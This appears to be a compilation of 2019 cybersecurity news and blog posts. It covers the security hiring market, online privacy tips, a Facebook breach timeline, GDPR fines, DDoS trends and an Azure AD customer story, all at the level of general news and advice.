These are all things I have experienced first-hand in the past year. Tech is tech, tools are tools, and the most important thing is my willingness and ability to learn and adapt. But, alas, very few organizations want to invest in their people. Very few organizations know how to interview for attitude, aptitude, and adaptability. It's truly sad, and I think it's a skill that organizations have actually lost in the last 10-15 years. I had a great job with AOL, and I landed it not because I had experience with every security tool on the market, but because I had a solid base technical knowledge and I had the attitude, aptitude, and adaptability to quickly learn and apply new things. THIS HAS BEEN LOST IN TODAY'S JOB MARKET.

---
To close this ranty post out, I just want to reiterate, for the umpteenth time, that I strongly believe the "talent gap" or "labor shortage" is largely imagined and manufactured because organizations don't know how to hire, make absolutely no commitment to train and retain their people, and have in general completely lost their way. It's very sad and very troubling. We used to know how to do this! Where have all these skills gone within HR and management?

Part of these issues are a direct result of cuts made during previous economic down-turns, but I also suspect that we're seeing the "day-trader" mentality as it hits hiring, too. In this age of 24x7 news and pervasive, ubiquitous social media, and endless amounts of raw outrage... we have lost our humanity within organizations. Human resources has always ultimately been about protecting organizations from their people, but it has really gotten broken badly in the past decade. Hiring managers are often forced to do too much with too little, all while being stuck following grossly outmoded thinking and strategies (e.g., if you build a SOC today thinking people first, then automation and orchestration, then I'm sorry to say that you're already starting 10 yrs behind the curve).

If you're trying to hire people, then you need to force introspection and open dialogue within your organization, and you need to DO IT NOW. I'm a GenX'er. I want to do good work with a good org and good team where I'm treated respectfully, but allowed work-life balance. I would like to have some meaning in my job. Younger generations are reportedly even more concerned about this last point, wanting to contribute meaningfully. Once upon a time, I was told by a higher-up that corporations could not exist if they weren't benefiting the general good of society. I'm not completely sure this is true, but I would love for it to be so. However, in application, what this means is that organizations must also take care of their people, which many are failing at today. Forget about all the various movements and management fads out there and take this to heart: If you want good employees who will stick with you, then you have to hire good people AND TREAT THEM RIGHT. It really is just that simple.

As a closing remark, I strongly recommend that people go read Laloux's Reinventing Organizations as it is remarkable and a necessary evolution in business management.

Addendum (1/31/19): One additional observation: Numbers lie. I have found here in the DC market that many jobs get reposted multiple times by placement/search firms. Positions, for example, with major firms like Fannie, Freddie, ManTech, DHS, CapOne, etc., will often show up a dozen times or more, but listed by the headhunter firms and not the actual hiring company. So, imagine that out of, say, 300k job postings for "cybersecurity," that number may actually be closer to 25-30k in real jobs. Quite shocking to think about and realize, and as a job searcher it's extremely frustrating. I'll literally get a flurry of inquiries from a half dozen or more recruiters when a new position posts. Crazy.

Sharing Isn’t Always Caring: 3 Tips to Help Protect Your Online Privacy

It’s 2019 and technology is becoming more sophisticated and prevalent than ever. With more technology comes greater connectivity. In fact, by 2020, there will be more than 20 billion internet-connected devices around the world. This equates to more than four devices per person. As we adopt new technology into our everyday lives, it’s important to consider how this emerging technology could lead to greater privacy risks if we don’t take steps to protect our data. That’s why the National Cyber Security Alliance (NCSA) started Data Privacy Day to help create awareness surrounding the importance of recognizing our digital footprints and safeguarding our data. To further investigate the impact of these footprints, let’s take a look at how we perceive the way data is shared and whose responsibility it is to keep our information safe.

The Impact of Social Media

Most of us interact with multiple social media platforms every day. And while social media is a great way to update your friends and family on your daily life, we often forget that these platforms also allow people we don’t really know to glimpse into our personal lives. For example, 82% of online stalkers use social media to find out information about potential victims, such as where they live or where they go to school. In other words, social media could expose your personal information to users beyond your intended audience.

Certain social media trends also bring up issues of privacy in the world of evolving technology. Take Facebook’s 10-year challenge, a recent viral trend encouraging users to post a side-by-side image of their profile pictures from 2009 and 2019. As WIRED reporter Katie O’Neill points out, the images offered in this trending challenge could potentially be used to train facial recognition software for age progression and age recognition. While the potential of this technology is mostly mundane, there is still a risk that this information could be used inequitably.

How to Approach Requests for Personal Data

Whether we’re using social media or other online resources, we all need to be aware of what personal data we’re offering out and consider the consequences of providing the information. While there are some instances where we can’t avoid sharing our personal data, such as for a government document or legal form, there are other areas where we can stand to be a little more conservative with the data that we divulge. For example, many of us have more than just our close family and friends on our social networks. So, if you’re sharing your location on your latest post, every single person who follows you has access to this information. The same goes for those online personality quizzes. While they may be entertaining, they put an unnecessary amount of your personal information out in the open. This is why it’s crucial to be thoughtful of how your data is collected and stored.

So, what steps can you take to better protect your online privacy? Check out the following tips to help safeguard your data:

  • Think before you post. Before tagging your friends on Instagram, sharing your location on Facebook, or enabling facial recognition, consider what this information reveals and how it could be used by a third party.
  • Set privacy and security settings. If you don’t want the entire World Wide Web to be able to access your social media, turn your profiles to private. You can also go to your device settings and choose which apps or browsers you want to share your location with and which ones you don’t.
  • Enable two-factor authentication. In the event that your data does become exposed, a strong, unique password can help prevent your accounts from being hacked. Furthermore, you can implement two-factor authentication to stay secure. This will help strengthen your online accounts with a unique, one-time code required to log in and access your data.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Sharing Isn’t Always Caring: 3 Tips to Help Protect Your Online Privacy appeared first on McAfee Blogs.

Industry reactions to Data Privacy Day 2019

The purpose of Data Privacy Day is to raise awareness and promote privacy and data protection best practices. Data Privacy Day began in the United States and Canada in January 2008 as an extension of the Data Protection Day celebration in Europe. Data Privacy Day is observed annually on Jan. 28.

Cindy Provin, CEO, nCipher Security

These high profile policy developments are sending a signal that the days of using personal data for commercial advantage … More

The post Industry reactions to Data Privacy Day 2019 appeared first on Help Net Security.

How to know when you’re ready for a fractional CISO

Many companies eventually find themselves in the following situation: they’re growing, their technology, infrastructure and teams are expanding, perhaps an M&A is on the horizon, and the board is asking pointed questions about security. It’s usually at this point that a business starts to notice fissures in the walls of what once felt like a tightly locked structure. New challenges in operations, culture, and security begin to arise. Inevitably, when a company hits this phase … More

The post How to know when you’re ready for a fractional CISO appeared first on Help Net Security.

How accepting that your network will get hacked will help you develop a plan to recover faster

As anyone in the network security world will tell you, it is an extremely intense and stressful job to protect the corporate network from ever-evolving security threats. For a security team, a 99 percent success rate is still a complete failure. That one time a hacker, piece of malware, or DDoS attack brings down your organization’s network (or network availability) is all that matters. It’s even more frustrating when you consider that the proverbial ‘bad … More

The post How accepting that your network will get hacked will help you develop a plan to recover faster appeared first on Help Net Security.

Facebook: A timeline of security failings

Facebook is the world’s most popular social network, boasting 2.27 billion active users every month. That’s 2.27 billion people who trust all kinds of personal information to Facebook for safekeeping.

Unfortunately, Facebook doesn’t have a great track record of protecting its users. This timeline shows some of the biggest privacy breaches since 2005.

December 2005

To help demonstrate threats to privacy caused by “oversharing” on social networks, a team of researchers publish a script that allows them to download user data from Facebook. The team manage to acquire personal data from 70,000 profiles, arguing that businesses are carrying out similar activities, stealing data without the permission of the affected users.

December 2007

Facebook releases a new product called “Beacon”, designed to help advertisers better understand their audience by tracking their movements on other websites. Beacon extends the user’s Facebook profile based on this behaviour, recording videos hired from Blockbuster Video for instance. This feature breaks the American Video Privacy Protection Act, and Facebook is forced to settle a $9.5 million class action lawsuit brought by affected users.

December 2009

Facebook publicly publish information marked private on users’ pages. A Federal Trade Commission investigation forces Facebook to apologise, and to promise improved management and protection of personal data.

June 2013

Facebook announces discovery of a bug that allows users to download contact information belonging to friends of friends – without asking permission. Official estimates suggest that as many as 6 million people have their personal information taken in this way.

February 2014

A new data-driven start-up called Cambridge Analytica asks volunteers to install a new Facebook app called thisisyourdigitallife. The app then downloads information from the user’s profile, including lists of friends, likes and some private messages. The app breaks Facebook’s terms of service, but remains in place until December 2015. By then 87 million profiles have been harvested by Cambridge Analytica, ready for use in targeting fake news stories and other marketing-related activities.

Facebook has already been fined £500,000 by the UK’s Information Commissioner for its part in the Cambridge Analytica scandal. The issue remains under investigation in the US and elsewhere.

April 2018

Facebook is forced to announce that ‘malicious actors’ have used the built-in search function to harvest the public profile data of almost their entire user base. Almost all 2 billion users have had their data collected by third parties without their permission.

June 2018

Journalists uncover “secret” agreements between Facebook and several smartphone manufacturers. In return for improving the Facebook experience on their devices, Samsung, Microsoft, Apple, Huawei, Lenovo and others have been given access to personal data belonging to the phone’s owner and their friends, even if those friends have chosen not to share their data with third parties.

July 2018

A new bug overrides users’ block lists. For 8 days, blocked users are able to see personal information against the wishes of account holders.

August 2018

The popular data-saving app Onavo is removed from the App Store after complaints that web activity is being collected by Facebook (Onavo’s owner), violating Apple’s privacy rules.

September 2018

A new bug in the “view as” feature allows hackers to forge authentication tokens and take control of up to 50 million user accounts.

Be careful who you trust with your data

Over the past 13 years Facebook has become a victim of its own success. With access to the personal data belonging to more than 2 billion people, the social network is a natural target for hackers and cyber criminals – but a relaxed attitude to security and privacy has only made it easier for malicious activity to thrive.

All Facebook users should regularly check their privacy and security settings to ensure they are using the tools provided to protect themselves. In the long term, however, questions need to be asked about whether the benefits of Facebook outweigh the obvious risks to users’ online safety.

The post Facebook: A timeline of security failings appeared first on Panda Security Mediacenter.

Why it’s important for organisations to train staff in cybersecurity

Breaches are an ongoing issue that organisations face on a day to day basis. For as long as risk carries

Why it’s important for organisations to train staff in cybersecurity on Latest Hacking News.

Hacking the GCHQ Backdoor

Last week, I evaluated the security of a recent GCHQ backdoor proposal for communications systems. Furthering the debate, Nate Cardozo and Seth Schoen of EFF explain how this sort of backdoor can be detected:

In fact, we think when the ghost feature is active -- silently inserting a secret eavesdropping member into an otherwise end-to-end encrypted conversation in the manner described by the GCHQ authors -- it could be detected (by the target as well as certain third parties) with at least four different techniques: binary reverse engineering, cryptographic side channels, network-traffic analysis, and crash log analysis. Further, crash log analysis could lead unrelated third parties to find evidence of the ghost in use, and it's even possible that binary reverse engineering could lead researchers to find ways to disable the ghost capability on the client side. It should be obvious that none of these possibilities are desirable for law enforcement or society as a whole. And while we've theorized some types of mitigations that might make the ghost less detectable by particular techniques, they could also impose considerable costs to the network when deployed at the necessary scale, as well as creating new potential security risks or detection methods.

Other critiques of the system were written by Susan Landau and Matthew Green.

EDITED TO ADD (1/26): Good commentary on how to defeat the backdoor detection.

GDPR-ready organizations see lowest incidence of data breaches

Organizations worldwide that invested in maturing their data privacy practices are now realizing tangible business benefits from these investments, according to Cisco’s 2019 Data Privacy Benchmark Study. The study validates the link between good privacy practice and business benefits as respondents report shorter sales delays as well as fewer and less costly data breaches.

Business benefits of privacy investments

The GDPR, which focused on increasing protection for EU residents’ privacy and personal data, became enforceable … More

The post GDPR-ready organizations see lowest incidence of data breaches appeared first on Help Net Security.

83% of global respondents experienced phishing attacks in 2018

Proofpoint analyzed data from tens of millions of simulated phishing attacks sent over a one-year period, along with nearly 15,000 cybersecurity professional survey responses, to provide an in-depth look at the state of global phishing attacks. Overall, 83 percent of global infosecurity respondents experienced phishing attacks in 2018, up from 76 percent in 2017, and nearly 60 percent saw an increase in employee detection following security awareness training. In addition, more organizations were affected by all … More

The post 83% of global respondents experienced phishing attacks in 2018 appeared first on Help Net Security.

The most effective security strategies to guard sensitive information

Today’s enterprise IT infrastructures are not largely hosted in the public cloud, nor are they SaaS-based, with security being the single largest barrier when it comes to cloud and SaaS adoption. With the recent rise in breaches and privacy incidents, enterprises are prioritizing the protection of their customers’ personally identifiable information, according to Ping Identity.

Most infrastructure is hybrid

Less than one quarter (21%) of IT and security professionals say that more than one half … More

The post The most effective security strategies to guard sensitive information appeared first on Help Net Security.

Enterprises turn to MSPs to mitigate huge skills gap concerns

A huge skills gap coupled with security worries is driving IT decision makers to engage Managed Service Providers (MSPs) to handle their IT needs, according to NTT Com. Of the 417 IT decision makers in the US from large enterprises across all industries who participated in the research study, 26 percent put security risks as their biggest challenge in managing in-house IT. This was followed by infrastructure complexity (10 percent). In addition, 16.5 percent said … More

The post Enterprises turn to MSPs to mitigate huge skills gap concerns appeared first on Help Net Security.

Research Suggests Human Error Responsible for Cyber Security Breaches

Cybersecurity incidents can be a huge problem for businesses and individuals. Hackers using malware to steal data is often the scenario

Research Suggests Human Error Responsible for Cyber Security Breaches on Latest Hacking News.

DNS hijacking of Department of Homeland Security causes emergency directive to be issued

As part of an emergency directive, the Department of Homeland Security (DHS) ordered federal government agencies to carry out audits

DNS hijacking of Department of Homeland Security causes emergency directive to be issued on Latest Hacking News.

Organizations waste money storing useless IT hardware

A survey of 600 data center experts from APAC, Europe and North America reveals that two in five organizations that store their data in-house spend more than $100,000 storing useless IT hardware that could pose a security or compliance risk. Astonishingly, 54 percent of these companies have been cited at least once or twice by regulators or governing bodies for noncompliance with international data protection laws. Fines of up to $1.5 million could be issued … More

The post Organizations waste money storing useless IT hardware appeared first on Help Net Security.

Branching out more efficiently and securely with SD-WAN

As enterprises expand, through organic growth or acquisition, they need to support the IT needs of more distributed locations. These often include teams in shared office spaces versus enterprise-owned or leased facilities. To serve remote locations and users, enterprises are rapidly moving toward cloud-based applications including Unified Communications as a Service (UCaaS). As always, IT teams are under pressure to contain costs and are turning to Software Defined Wide Area Networks (SD-WAN) to play a … More

The post Branching out more efficiently and securely with SD-WAN appeared first on Help Net Security.

Reimagining risk management to mitigate looming economic dangers

In a volatile market environment and with the edict to “do more with less,” many financial institutions are beginning efforts to reengineer their risk management programs, according to a new survey by Deloitte Global, with emerging technologies in the driver’s seat. Seventy percent of the financial services executives surveyed said their institutions have either recently completed an update of their risk management program or have one in progress, while an additional 12 percent said they … More

The post Reimagining risk management to mitigate looming economic dangers appeared first on Help Net Security.

Cyberattacks fueled by geopolitical tension are increasing

Billions of personal records were stolen in 2018, unearthed in breaches that successfully targeted household names in government, technology, healthcare, travel and hospitality. Compounding the problem has been increased geopolitical tension between western democracies and countries like Russia, China and North Korea. Modern cyberattacks appear to increasingly be fueled by geopolitical tension and reveal how clever attackers have become in evolving to remain undetected — using techniques such as lateral movement, island hopping and counter … More

The post Cyberattacks fueled by geopolitical tension are increasing appeared first on Help Net Security.

Federal Cybersecurity Posture “Untenable,” According to OMB Risk Report

When he issued Executive Order 13800 (EO 13800) on Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure, President Trump’s goal was to highlight that security and public accountability of government officials are foundational pillars while emphasizing the importance of reducing cybersecurity risks to the Nation. In accordance with the Executive Order, effective cybersecurity requires […]… Read More

The post Federal Cybersecurity Posture “Untenable,” According to OMB Risk Report appeared first on The State of Security.

Reported Cyber Attacks on U.S. Electric Utilities and Government Agencies

Hundreds of contractors and subcontractors with connections to U.S. electric utilities and government agencies have been hacked, according to a recent report by the Wall Street Journal. The U.S. government has linked the hackers to a Russian state-sponsored group, sometimes called Dragonfly or Energetic Bear. The U.S. government alerted the public that the hacking campaign started in March 2016, if not earlier, although many of its victims were unaware of the incident until notified by the Federal Bureau of Investigation and Department of Homeland Security, the Wall Street Journal reports.

Instead of using sophisticated techniques to directly attack utilities companies, the hackers largely “exploited trusted business relationships using impersonation and trickery” to access the networks of U.S. electric utilities, such as by planting malware on sites of online publications frequently read by utility engineers and through clever spear phishing emails. According to the article, Jonathan Homer, the Department of Homeland Security’s Chief of Industrial Control Systems Group, reported in a briefing to utilities last year that the hackers could have caused temporary power outages. While the exact number of utilities and vendors compromised is unknown, the article goes on, industry experts say that the hackers likely still have access to some systems.

Voice of the Customer: Azure AD helps lululemon enable productivity and security all at once for its employees

Today’s post was written by Sue Bohn, Director of Program Management at Microsoft, and Simon Cheng, who is responsible for Identity and Access Management at lululemon.

Happy New Year and welcome to the next installment of the Voice of the Customer blog series. My name is Sue Bohn and I am the director of Program Management for Identity and Access Management. I’m really excited about our next blog in this series. Last time, we featured The Walsh Group. Today, I am sharing a story from lululemon, who really inspired me to think more broadly about what you can achieve when you step back and look at where you want to go.

Simon Cheng, responsible for Identity and Access Management at lululemon, is today a strong believer that every step towards cloud Identity and Access Management makes you more secure, but that wasn’t always the case. Read on to learn more about lululemon’s experience implementing Azure Active Directory (Azure AD).

Too many apps, too many passwords

At lululemon, our journey to Azure AD began with two overarching business requirements: 1. Secure all our apps and 2. Simplify user access. We knew, based on the typical behavior we’ve seen in the past, that most of our users were likely using the same corporate password across all the apps they use, including the ones we don’t manage. This meant that if even just one of these apps had security vulnerabilities, a hacker could exploit the vulnerability to get into our corporate resources. And we would have no idea! Our security is only as strong as the weakest app being accessed, and so, if you can imagine, the challenge was that we had over 300+ applications! To protect our corporate resources, we needed to ensure that the authentication process for each app was secure.

Our shadow IT environment wasn’t just a security challenge, it also frustrated our users. Over and over we heard “there are too many portals and too many passwords.” This sentiment drove our second business requirement, which we boiled down to an overriding principle: “Not another portal, not another password.” So, our solution needed to address security and simplify user access without reducing business flexibility. The obvious answer was to consolidate identities, and this quickly led us to Azure AD and Microsoft Enterprise Mobility + Security (EMS). As an Office 365 customer, our users were comfortable and familiar with the Office 365 sign-in experience, and so it was an easy decision. Once we had chosen a solution, our next big task was rolling it out without disrupting our users, which is really where my concern was: would our users embrace it?

Single Sign On (SSO) sells itself

When we began the rollout of Azure AD, our top concern was whether our employees would comply. As it turns out, I completely underestimated our users, and my concerns were really nothing. Within three months of the Azure AD rollout, our users loved the SSO experience so much that the business units came to us requesting that additional apps get rolled on. Even risk-based Multi-Factor Authentication (MFA) enforced by the Azure AD conditional access policy feature went more smoothly than I expected. We hardly heard any complaints and even fewer calls on how to set it up. For highly sensitive apps, such as our financial and HR apps, we followed a recommended approach to enforce MFA at every sign-in. For several other less sensitive apps, we were able to prioritize user experience and protect them with risk-based conditional access rules.

In 2013, we had two apps onboarded: ServiceNow and Workday; now we have over 200! And every single one of our 18,000 users is protected by conditional access and MFA. I am really proud of this accomplishment as it has enabled higher productivity for our organization while maintaining stronger security because our employees are using it! This experience taught me not to underestimate our users, and I think this is because they are familiar with security measures, having already learned to do so through consumer services such as social media. Had I known this when we started, I would have deployed Azure AD much sooner.

The cloud allowed us to implement more security features faster than we ever could on-premises

Once we had Azure AD deployed, our next project was to implement Azure AD Privileged Identity Management (PIM). Azure AD PIM allows us to enable just-in-time administrative access, which significantly reduces the possibility that our administrative accounts will get compromised. Launching PIM was an eye-opening experience! This is a capability that is typically very labor-intensive and time-consuming to operate.

I am constantly delighted with how fast I can deploy services in the cloud, Azure AD PIM being a prime example. More often than not, the trap I’ve seen organizations fall into is that they plan based on capabilities that exist within solutions rather than what’s needed to secure their users. This is exactly where Azure AD and cloud wins over on-premises solutions. My takeaway has been that it is better to step back and plan what needs to be done for my organization and then just let the cloud services roll in almost automagically. Of course, where there are gaps, I work directly with the Azure AD engineering team!

Just in the last year, we have deployed, from pilot to production:

  1. Azure AD Connect implementation and Self Service Password Reset (SSPR) migration from the old tool (6 weeks)
  2. MFA registration, Azure AD conditional access, and Azure AD Identity Protection (7 weeks)
  3. Microsoft Advanced Threat Analytics (3 weeks)
  4. Group-based licensing (3 days)
  5. Azure Information Protection (8 weeks)
  6. Azure AD Privileged Identity Management (3 days!)
  7. Countless apps (each in a matter of hours!)

Learnings from lululemon

A big thanks to Simon! It is always great to learn from our customers’ deployments. In lululemon’s case, the need to take a step back and develop a plan based on the security goals, rather than a set of capabilities, really hits home. We can always plan something in the confines of what we currently have, but the fact is that new features get rolled out at cloud speed. It is great to see customers like lululemon deploy services in the cloud so quickly and benefit from them. Come back to our Secure blog to check in on our next customer blog and also read some other articles around Identity and Access Management and Zero Trust Networks.

The post Voice of the Customer: Azure AD helps lululemon enable productivity and security all at once for its employees appeared first on Microsoft Secure.

Google fined $57 million in France for GDPR violation

In an action initiated against Google LLC by two activists, the Commission Nationale de l’informatique et des libertés (CNIL) carried

Google fined $57 million in France for GDPR violation on Latest Hacking News.

Most out of date applications exposed: Shockwave, VLC and Skype top the list

More than half (55%) of PC applications installed worldwide are out-of-date, making PC users and their personal data vulnerable to security risks. Avast’s PC Trends Report 2019 found that users are making themselves vulnerable by not implementing security patches and keeping outdated versions of popular applications on their PCs. The applications where updates are most frequently neglected include Adobe Shockwave (96%), VLC Media Player (94%) and Skype (94%). The report, which uses anonymized and aggregated … More

The post Most out of date applications exposed: Shockwave, VLC and Skype top the list appeared first on Help Net Security.

First Large GDPR Fine issued and it’s to Google for €50 million

Every member state, organisation and almost every individual have been watching supervisory authorities closely to see if and who will

First Large GDPR Fine issued and it's to Google for €50 million on Latest Hacking News.

5G Is Coming: Security Risks You Need to Know About

The future of connectivity is here: 5G. This new network is set to roll out across the nation this coming year and bring greater speed to our handheld devices, which means more data and lower latency. But perhaps one of the most anticipated and popular benefits is that it will allow even more IoT devices to come online and encourage more connection between those devices. This would enable users to remotely connect to or monitor their IoT devices like kitchen or security gadgets. The promise of more connectivity, a smoother IoT user experience, and even more devices online means there are likely more opportunities and avenues for cyberattacks. 5G will no doubt shape the foreseeable future; let’s see how.

Today, interconnected devices operate on low-powered, low-data-rate networks, such as Cat-M and NB-IoT. With the introduction of 5G networks across the world, the capabilities of VR and AR, AI and ML, and automation and robotics will enhance immensely. Take self-driving cars, for example. These machines require close proximity to their computing to reduce the latency of decision making. The capabilities of 5G don’t end there either. From manufacturing, transportation and logistics, to public safety and the establishment of smart cities, industries are at the ready to take their business to the next level with 5G. With this newfound growing anticipation for the future of 5G, the question has to be asked, what are the security implications for smaller IoT devices?

From an innovation standpoint, 5G is a beacon of light, but from a cybersecurity standpoint, 5G is a “hotbed for a new era of intensified cyberwar.” Distributed denial-of-service (DDoS) attacks are a particular cause of concern for cybersecurity researchers. Devices like refrigerators, thermometers, even light bulbs, will be able to come online because of 5G. Users will be able to remotely check on these appliances through a simple app, but these devices can also be usurped by malicious characters. This increased connectivity and power could see big-name sites down for days, or even affect city utility capabilities. Government agencies and private entities are not immune either, but they do have plans in place in the event a DDoS attack occurs.

While consumers can only wait and see what happens with the rollout, industries across the board will want to harness the benefits of 5G. However, consumers and organizations alike need to be cautious in terms of how 5G could be used to help, or hinder, us in the future. Rest assured, even if malicious actors utilize this technology, McAfee’s security strategy will continue to keep pace with the ever-changing threat landscape.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post 5G Is Coming: Security Risks You Need to Know About appeared first on McAfee Blogs.

Unauthorised Remote Access Vulnerability Discovered on Cisco Small Business Switches

Businesses using Cisco Small Business 200 Series Smart Switches; CSB 300 Series Managed Switches; Cisco 250 Series Smart Switches; CSB

Unauthorised Remote Access Vulnerability Discovered on Cisco Small Business Switches on Latest Hacking News.

Industry reactions to Google’s €50 million GDPR violation fine

On 21 January 2019, the French National Data Protection Commission (CNIL) imposed a financial penalty of €50 million against Google, in accordance with the GDPR. This is the first time that the CNIL has applied the new sanction limits provided by the GDPR. The amount decided and the publicity of the fine are justified by the severity of the infringements observed regarding the essential principles of the GDPR: transparency, information and consent. Here are some reactions … More

The post Industry reactions to Google’s €50 million GDPR violation fine appeared first on Help Net Security.

Business resilience should be a core company strategy, so why are businesses struggling to take action?

A recent survey showed that only 51% of U.S. business decision makers say their organization is definitely as resilient as it needs to be against disruptions such as cyber threats. In addition, the survey showed that 96% of U.S. business decision makers claim business resilience should be a core company strategy. If 96% of business decision makers realize this, why are organizations still struggling to protect themselves against cybercrime and technology-based disruption? IT teams face … More

The post Business resilience should be a core company strategy, so why are businesses struggling to take action? appeared first on Help Net Security.

Agents of disruption: Four testing topics argue the case for agentless security

Let me introduce myself. I’m a set of flaws in your otherwise perfect, agent-based security world. Like all disruptive agents, I derail your best-laid plans with expensive havoc; but in my case I create sticky situations inside your multi-cloud arrangement. You may be thinking that the premise of this article is bogus, because most cloud-based security systems automate the deployment and management of agents; and any one of those and their kid can microsegment and … More

The post Agents of disruption: Four testing topics argue the case for agentless security appeared first on Help Net Security.

SSDP amplification attacks rose 639%

The Nexusguard Q3 2018 Threat Report has revealed the emergence of an extremely stealthy DDoS attack pattern targeting communications service providers (CSPs).

Figure: Comparison between normal attack traffic and attack traffic with legitimate traffic

This new vector exploits the large attack surface of ASN-level (autonomous system number) CSPs by spreading tiny attack traffic across hundreds of IP addresses to evade detection. The ongoing evolution of DDoS methods suggests that CSPs need to enhance their network security … More

The post SSDP amplification attacks rose 639% appeared first on Help Net Security.

Beware the man in the cloud: How to protect against a new breed of cyberattack

One malicious tactic that has become quite prevalent in recent years is known as a ‘man in the cloud’ (MitC) attack. This attack aims to access victims’ accounts without the need to obtain compromised user credentials beforehand. Below, this article explains the anatomy of MitC attacks and offers practical advice about what can be done to defend against them. What is MitC attack? To gain access to cloud accounts, MitC attacks take advantage of the … More

The post Beware the man in the cloud: How to protect against a new breed of cyberattack appeared first on Help Net Security.

Machine learning trumps AI for security analysts

While machine learning is one of the biggest buzzwords in cybersecurity and the tech industry in general, the phrase itself is often overused and misapplied, leaving many with their own, incorrect definition of what machine learning actually is. So, how do you cut through all the noise to separate fact from fiction? And how can this tool be best applied to security operations? What is machine learning? Machine learning (ML) is an algorithm that … More

The post Machine learning trumps AI for security analysts appeared first on Help Net Security.

Cybercrime could cost companies trillions over the next five years

Companies globally could incur $5.2 trillion in additional costs and lost revenue over the next five years due to cyberattacks, as dependency on complex internet-enabled business models outpaces the ability to introduce adequate safeguards that protect critical assets, according to Accenture. Based on a survey of more than 1,700 CEOs and other C-suite executives around the globe, the report — Securing the Digital Economy: Reinventing the Internet for Trust — explores the complexities of the … More

The post Cybercrime could cost companies trillions over the next five years appeared first on Help Net Security.

Researchers analyze DDoS attacks as coordinated gang activities

In a new report, NSFOCUS introduced the IP Chain-Gang concept, in which each chain-gang is controlled by a single threat actor or a group of related threat actors and exhibits similar behavior across the various attacks conducted by the same gang.

Figure: IP Gang attack-type classification against attack volume size

Researchers analyzed attack types, volume, size of events, gang activities, and attack rates. By studying the historical behavior of the 80 gangs identified in the report, … More

The post Researchers analyze DDoS attacks as coordinated gang activities appeared first on Help Net Security.

The Imperative to Address Security Concerns of the Rapidly Evolving Internet of Things

The Internet of Things (IoT) broadly refers to devices and equipment that are readable, recognizable, locatable, addressable and/or controllable via the internet. This includes everything from edge computing devices to home appliances, from wearable technology to cars. IoT represents the melding of the physical world and the digital world, as sensors are not costly and wireless access is […]… Read More

The post The Imperative to Address Security Concerns of the Rapidly Evolving Internet of Things appeared first on The State of Security.

Monero Price Analysis: Stronger Malware to Mine Monero; XMR/USD Has Room for Another Potential Squeeze South

Researchers: a stronger malware has been uncovered, which can mine Monero. XMR/USD price action remains stuck in a narrowing range, subject to an imminent breakout. The XMR/USD price has seen some upside on Saturday, holding gains of around 3% towards the latter stages of the day. Despite the press higher from the bulls, a move […]

The post Monero Price Analysis: Stronger Malware to Mine Monero; XMR/USD Has Room for Another Potential Squeeze South appeared first on Hacked: Hacking Finance.

6 Reasons We Need to Boost Cybersecurity Focus in 2019

Paying attention to cybersecurity is more important than ever in 2019. But, some companies are still unwilling to devote the necessary resources to securing their infrastructures against cyberattacks, and naive individuals think they’re immune to the tactics of cybercriminals, too.

For people who still need some convincing that cybersecurity is an essential point of focus, here are six reasons.

1. The Average Cost of a Cyberattack Exceeds $1 Million

It’s no surprise that cyberattacks are costly, but some people will likely be shocked at the massive expenses that could result. According to a recent report from Radware, the total costs are more than $1 million. Additionally, victims report issues not directly related to financial losses, such as decreases in productivity or negative customer experiences.

Based on the above statistic, enterprises should conclude that although it costs money to invest in cybersecurity strategies, the expenses could be more substantial if organizations choose not to put enough of their resources toward experts and tools that minimize threats.

2. The U.S. Government Says It’s Time to Come Up With a Better Plan

The U.S. government, as well as the authorities from other nations, continually struggle to safeguard against digital attacks from rivals. The challenges are so immense that government bodies and officials warn that the United States needs an improved way to stop adversaries.

A State Department report warned that the country is increasingly dependent on networked information systems, and foes from other nations have learned to exploit that dependence and use it to disrupt the lives of Americans.

Most people who live in the U.S. can at least imagine the consequences of a severe cyber attack that affected the country’s ability to proceed with normal operations. Since government authorities researched the possibility and asserted there’s no time to waste in coming up with an improved approach to cybersecurity, that’s all the more reason to take action this year.

3. The Methods of Attack Are Diversifying

A decade or so ago, people typically felt sufficiently secure online by installing anti-virus software on their computers. That’s still a worthy precaution to take, but it’s no longer adequate for preventing all or even most of the attacks a hacker might try.

According to a 2014 report, cybercriminals orchestrated 75 percent of attacks through publicly known software vulnerabilities. But, they also try to gain people’s credentials through phishing attacks, lock down their systems with ransomware or infiltrate poorly secured connected devices to name but a few possibilities.

People have a growing number of ways to use technology and rely on connected devices, but that also means the likelihood goes up for potentially unfamiliar kinds of attacks. Focusing on cybersecurity this year requires, in part, understanding the most recent and common types of threats and protecting networks against them.

4. Recent Breaches Victimized Millions

Equifax and Starwood/Marriott dealt with breaches that compromised the data of well over 100 million victims. The earlier revelation about the financial costs of cyber attacks is damning in itself, but it’s crucial for brands — and consumers themselves — to recognize that data breaches can be unintentional or malicious, but in any case, they could affect millions of people.

Then, affected companies have to engage in damage control in an attempt to restore lost trust. Even when those entities put forth the effort, they may still find that customers behave differently following breaches.

More specifically, an April 2018 study examined the connection between consumer trust and spending. It involved respondents giving a trust score to businesses. The survey revealed that 15 percent of low-trust customers decreased how much they spent at companies. But, in cases of high instances of trust, the decrease in consumer spending was only 4 percent.

5. It Takes Months to Identify and Contain Breaches

If a person or business has a significant water leak in a well-used area, the problem is usually easy to spot and fix. But, it’s typically not so straightforward with cyber-related issues.

Research from 2018 published by IBM found that, on average, it takes 197 days to identify a breach and 69 days to contain it. Those timeframes give hackers plenty of time to do damage that may prove irreparable. Then, once headlines indicate how long a breach remained unnoticed, the reputational damage could be severely harmful, too.

Making cybersecurity a focal point this year could minimize the time spent looking for areas of concern within a network, especially if using artificial intelligence-based strategies that learn normal conditions and give warnings about deviations.

6. Cybercrime Is Extremely Profitable

Some criminals alter their methods once it becomes apparent that their current wrongdoings are no longer profitable. But, that probably won’t happen for a while concerning online-based crimes. Research from a criminology expert published in April 2018 highlighted how the worldwide revenues from cybercrime are at least 1.5 trillion annually.

The investigation talked about how cybercrime represents an interconnected web of profit possibilities with blurred lines between legal and illegal activities. If people don’t fight back against online criminals at both personal and organizational levels, hackers will have more opportunities than ever to continue making income while others suffer.

Failing to Focus on Cybercrime This Year Could Cause an Assortment of Issues

